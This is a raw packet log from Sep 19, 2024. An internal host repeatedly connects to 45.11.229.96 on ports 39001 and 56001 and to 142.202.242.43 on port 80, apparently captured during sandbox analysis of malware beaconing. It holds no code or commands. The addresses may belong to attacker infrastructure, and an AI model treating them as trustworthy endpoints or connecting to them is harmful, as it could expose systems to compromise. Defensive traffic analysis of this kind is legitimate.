Sep 19, 2024 02:42:27.898840904 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:42:28.067934036 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:42:28.141655922 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:42:28.698424101 CEST	49873	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:28.921854019 CEST	39001	49873	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:28.922040939 CEST	49873	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:29.126379013 CEST	39001	49873	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:29.126571894 CEST	49873	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:29.126763105 CEST	49873	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:29.236346006 CEST	49874	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:29.308618069 CEST	39001	49873	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:29.431278944 CEST	39001	49874	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:29.431464911 CEST	49874	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:30.504470110 CEST	49874	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:30.827924967 CEST	39001	49874	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:30.829626083 CEST	49874	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:31.040883064 CEST	39001	49874	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:31.041826010 CEST	49874	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:31.042016983 CEST	49874	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:31.157634020 CEST	49875	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:31.237181902 CEST	39001	49874	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:31.321980953 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:42:31.347083092 CEST	39001	49875	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:31.348594904 CEST	49875	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:31.509586096 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:42:31.640850067 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:42:32.235042095 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:32.429591894 CEST	49875	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:32.461368084 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:32.462774992 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:32.671274900 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:32.812496901 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:32.842196941 CEST	39001	49875	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:32.843142986 CEST	49875	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:32.979171991 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:32.980439901 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:32.982872009 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:32.987622976 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:32.988864899 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:33.059175968 CEST	39001	49875	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:33.060461044 CEST	49875	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:33.060650110 CEST	49875	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:33.172852039 CEST	49876	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:33.201638937 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:33.201788902 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:33.243853092 CEST	39001	49875	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:33.367554903 CEST	39001	49876	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:33.367824078 CEST	49876	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:33.420350075 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:33.600958109 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:42:33.827853918 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:42:34.459834099 CEST	49876	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:34.686245918 CEST	39001	49876	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:34.686532021 CEST	49876	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:34.869570017 CEST	39001	49876	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:34.869796038 CEST	49876	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:34.869987011 CEST	49876	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:34.984956026 CEST	49877	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:35.050554037 CEST	39001	49876	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:35.160965919 CEST	39001	49877	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:35.161221981 CEST	49877	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:36.221972942 CEST	49877	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:36.513943911 CEST	39001	49877	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:36.514193058 CEST	49877	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:36.695753098 CEST	39001	49877	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:36.695983887 CEST	49877	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:36.696162939 CEST	49877	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:36.812751055 CEST	49878	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:36.870755911 CEST	39001	49877	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:36.992789984 CEST	39001	49878	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:36.993041992 CEST	49878	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:38.065856934 CEST	49878	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:38.326838970 CEST	39001	49878	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:38.327018023 CEST	49878	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:38.511708021 CEST	39001	49878	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:38.511933088 CEST	49878	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:38.512139082 CEST	49878	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:38.625413895 CEST	49879	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:38.687087059 CEST	39001	49878	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:38.802720070 CEST	39001	49879	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:38.803015947 CEST	49879	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:39.876724005 CEST	49879	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:40.123173952 CEST	39001	49879	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:40.123389959 CEST	49879	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:40.306696892 CEST	39001	49879	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:40.306938887 CEST	49879	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:40.307184935 CEST	49879	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:40.421267033 CEST	49880	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:40.483884096 CEST	39001	49879	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:40.601088047 CEST	39001	49880	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:40.601406097 CEST	49880	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:41.691539049 CEST	49880	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:41.920591116 CEST	39001	49880	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:41.920861006 CEST	49880	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:42.106681108 CEST	39001	49880	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:42.106956959 CEST	49880	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:42.107191086 CEST	49880	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:42.217670918 CEST	49881	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:42.283592939 CEST	39001	49880	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:42.410939932 CEST	39001	49881	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:42.411227942 CEST	49881	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:43.473201990 CEST	49881	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:43.812856913 CEST	39001	49881	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:43.813087940 CEST	49881	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:43.997122049 CEST	39001	49881	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:43.997333050 CEST	49881	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:43.997579098 CEST	49881	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:44.107752085 CEST	49882	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:44.178786039 CEST	39001	49881	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:44.284496069 CEST	39001	49882	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:44.284749985 CEST	49882	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:45.360409975 CEST	49882	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:45.627765894 CEST	39001	49882	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:45.628005981 CEST	49882	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:45.820707083 CEST	39001	49882	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:45.821006060 CEST	49882	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:45.821253061 CEST	49882	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:45.935528994 CEST	49883	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:45.997617006 CEST	39001	49882	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:46.128818035 CEST	39001	49883	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:46.129163027 CEST	49883	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:47.192558050 CEST	49883	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:47.529634953 CEST	39001	49883	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:47.529911995 CEST	49883	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:47.719577074 CEST	39001	49883	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:47.719929934 CEST	49883	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:47.720138073 CEST	49883	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:47.841485023 CEST	49884	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:47.911900997 CEST	39001	49883	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:48.042164087 CEST	39001	49884	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:48.042545080 CEST	49884	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:49.143054008 CEST	49884	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:49.514523983 CEST	39001	49884	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:49.514760017 CEST	49884	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:49.698313951 CEST	39001	49884	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:49.698563099 CEST	49884	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:49.698745966 CEST	49884	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:49.825462103 CEST	49885	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:49.874681950 CEST	39001	49884	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:50.000663996 CEST	39001	49885	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:50.000885010 CEST	49885	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:51.113043070 CEST	49885	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:51.373357058 CEST	39001	49885	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:51.373560905 CEST	49885	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:51.562144041 CEST	39001	49885	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:51.562511921 CEST	49885	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:51.562695026 CEST	49885	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:51.684324980 CEST	49886	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:51.737554073 CEST	39001	49885	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:51.859298944 CEST	39001	49886	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:51.859519005 CEST	49886	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:52.755001068 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:42:52.924654007 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:42:52.971647978 CEST	49886	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:53.042256117 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:42:53.329262972 CEST	39001	49886	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:53.329566002 CEST	49886	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:53.515074015 CEST	39001	49886	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:53.515364885 CEST	49886	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:53.515584946 CEST	49886	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:53.637006044 CEST	49887	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:53.690291882 CEST	39001	49886	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:53.813744068 CEST	39001	49887	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:53.814181089 CEST	49887	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:54.920491934 CEST	49887	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:55.328423977 CEST	39001	49887	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:55.328715086 CEST	49887	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:55.518134117 CEST	39001	49887	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:55.518426895 CEST	49887	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:55.518632889 CEST	49887	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:55.604836941 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:42:55.636444092 CEST	49888	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:55.694274902 CEST	39001	49887	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:55.729185104 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:42:55.812628984 CEST	39001	49888	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:55.812895060 CEST	49888	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:56.872931957 CEST	49888	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:57.094574928 CEST	39001	49888	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:57.094798088 CEST	49888	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:57.281485081 CEST	39001	49888	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:57.281707048 CEST	49888	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:57.281903028 CEST	49888	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:57.401664972 CEST	49889	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:57.456558943 CEST	39001	49888	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:57.581301928 CEST	39001	49889	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:57.581691980 CEST	49889	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:58.238538980 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:58.467077971 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:58.467355967 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:58.653271914 CEST	49889	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:58.655982018 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:58.712842941 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:58.887962103 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:58.890360117 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:59.014174938 CEST	39001	49889	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:59.014404058 CEST	49889	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:59.112911940 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:59.113156080 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:59.206310034 CEST	39001	49889	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:59.206487894 CEST	49889	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:59.206649065 CEST	49889	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:59.323308945 CEST	49890	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:42:59.342096090 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:59.381324053 CEST	39001	49889	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:59.503027916 CEST	39001	49890	45.11.229.96	192.168.11.30
Sep 19, 2024 02:42:59.503292084 CEST	49890	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:00.577912092 CEST	49890	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:00.795432091 CEST	39001	49890	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:00.796561003 CEST	49890	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:00.983772993 CEST	39001	49890	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:00.985007048 CEST	49890	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:00.985172987 CEST	49890	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:01.087027073 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:43:01.103960991 CEST	49891	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:01.159827948 CEST	39001	49890	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:01.227866888 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:43:01.285742998 CEST	39001	49891	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:01.287087917 CEST	49891	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:02.359792948 CEST	49891	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:02.717225075 CEST	39001	49891	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:02.718678951 CEST	49891	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:02.917325974 CEST	39001	49891	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:02.918687105 CEST	49891	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:02.918868065 CEST	49891	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:03.041094065 CEST	49892	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:03.094984055 CEST	39001	49891	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:03.216706038 CEST	39001	49892	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:03.217746019 CEST	49892	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:04.293447971 CEST	49892	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:04.519977093 CEST	39001	49892	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:04.521452904 CEST	49892	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:04.715186119 CEST	39001	49892	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:04.716196060 CEST	49892	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:04.716429949 CEST	49892	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:04.821608067 CEST	49893	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:04.896594048 CEST	39001	49892	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:04.998697042 CEST	39001	49893	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:05.000369072 CEST	49893	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:06.076278925 CEST	49893	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:06.328681946 CEST	39001	49893	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:06.329832077 CEST	49893	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:06.547070026 CEST	39001	49893	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:06.548502922 CEST	49893	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:06.548697948 CEST	49893	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:06.665231943 CEST	49894	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:06.725997925 CEST	39001	49893	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:06.852128029 CEST	39001	49894	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:06.853476048 CEST	49894	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:07.932831049 CEST	49894	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:08.329185009 CEST	39001	49894	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:08.330503941 CEST	49894	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:08.523704052 CEST	39001	49894	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:08.525341988 CEST	49894	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:08.525551081 CEST	49894	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:08.633429050 CEST	49895	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:08.708074093 CEST	39001	49894	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:08.828943014 CEST	39001	49895	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:08.829768896 CEST	49895	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:09.901063919 CEST	49895	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:10.128110886 CEST	39001	49895	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:10.128323078 CEST	49895	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:10.362283945 CEST	39001	49895	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:10.363758087 CEST	39001	49895	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:10.365403891 CEST	49895	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:10.365586996 CEST	49895	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:10.476767063 CEST	49896	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:10.551558018 CEST	39001	49895	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:10.654263020 CEST	39001	49896	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:10.654551029 CEST	49896	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:11.728920937 CEST	49896	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:11.953352928 CEST	39001	49896	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:11.953486919 CEST	49896	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:12.144804001 CEST	39001	49896	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:12.145872116 CEST	49896	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:12.146058083 CEST	49896	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:12.257678032 CEST	49897	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:12.340993881 CEST	39001	49896	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:12.435164928 CEST	39001	49897	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:12.436326981 CEST	49897	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:13.509507895 CEST	49897	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:13.733433962 CEST	39001	49897	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:13.734503984 CEST	49897	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:13.919677019 CEST	39001	49897	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:13.920808077 CEST	49897	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:13.921010971 CEST	49897	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:14.038872004 CEST	49898	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:14.098064899 CEST	39001	49897	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:14.214114904 CEST	39001	49898	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:14.214464903 CEST	49898	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:15.289887905 CEST	49898	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:15.514465094 CEST	39001	49898	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:15.515659094 CEST	49898	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:15.697161913 CEST	39001	49898	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:15.699055910 CEST	49898	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:15.699224949 CEST	49898	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:15.819603920 CEST	49899	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:15.874180079 CEST	39001	49898	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:15.996259928 CEST	39001	49899	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:15.997551918 CEST	49899	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:17.072314978 CEST	49899	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:17.294992924 CEST	39001	49899	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:17.295203924 CEST	49899	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:17.479614973 CEST	39001	49899	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:17.481106997 CEST	49899	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:17.481281996 CEST	49899	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:17.578449965 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:43:17.591438055 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:43:17.600492001 CEST	49900	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:17.658143997 CEST	39001	49899	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:17.739753008 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:43:17.747832060 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:43:17.780390024 CEST	39001	49900	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:17.781698942 CEST	49900	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:17.942827940 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:43:18.860670090 CEST	49900	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:19.123493910 CEST	39001	49900	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:19.125094891 CEST	49900	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:19.311417103 CEST	39001	49900	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:19.313225985 CEST	49900	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:19.313438892 CEST	49900	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:19.427993059 CEST	49901	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:19.489801884 CEST	39001	49900	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:19.608906984 CEST	39001	49901	45.11.229.96	192.168.11.30
Sep 19, 2024 02:43:19.609819889 CEST	49901	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:20.679465055 CEST	49901	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:43:20.948717117 CEST	39001	49901	45.11.229.96	192.168.11.30
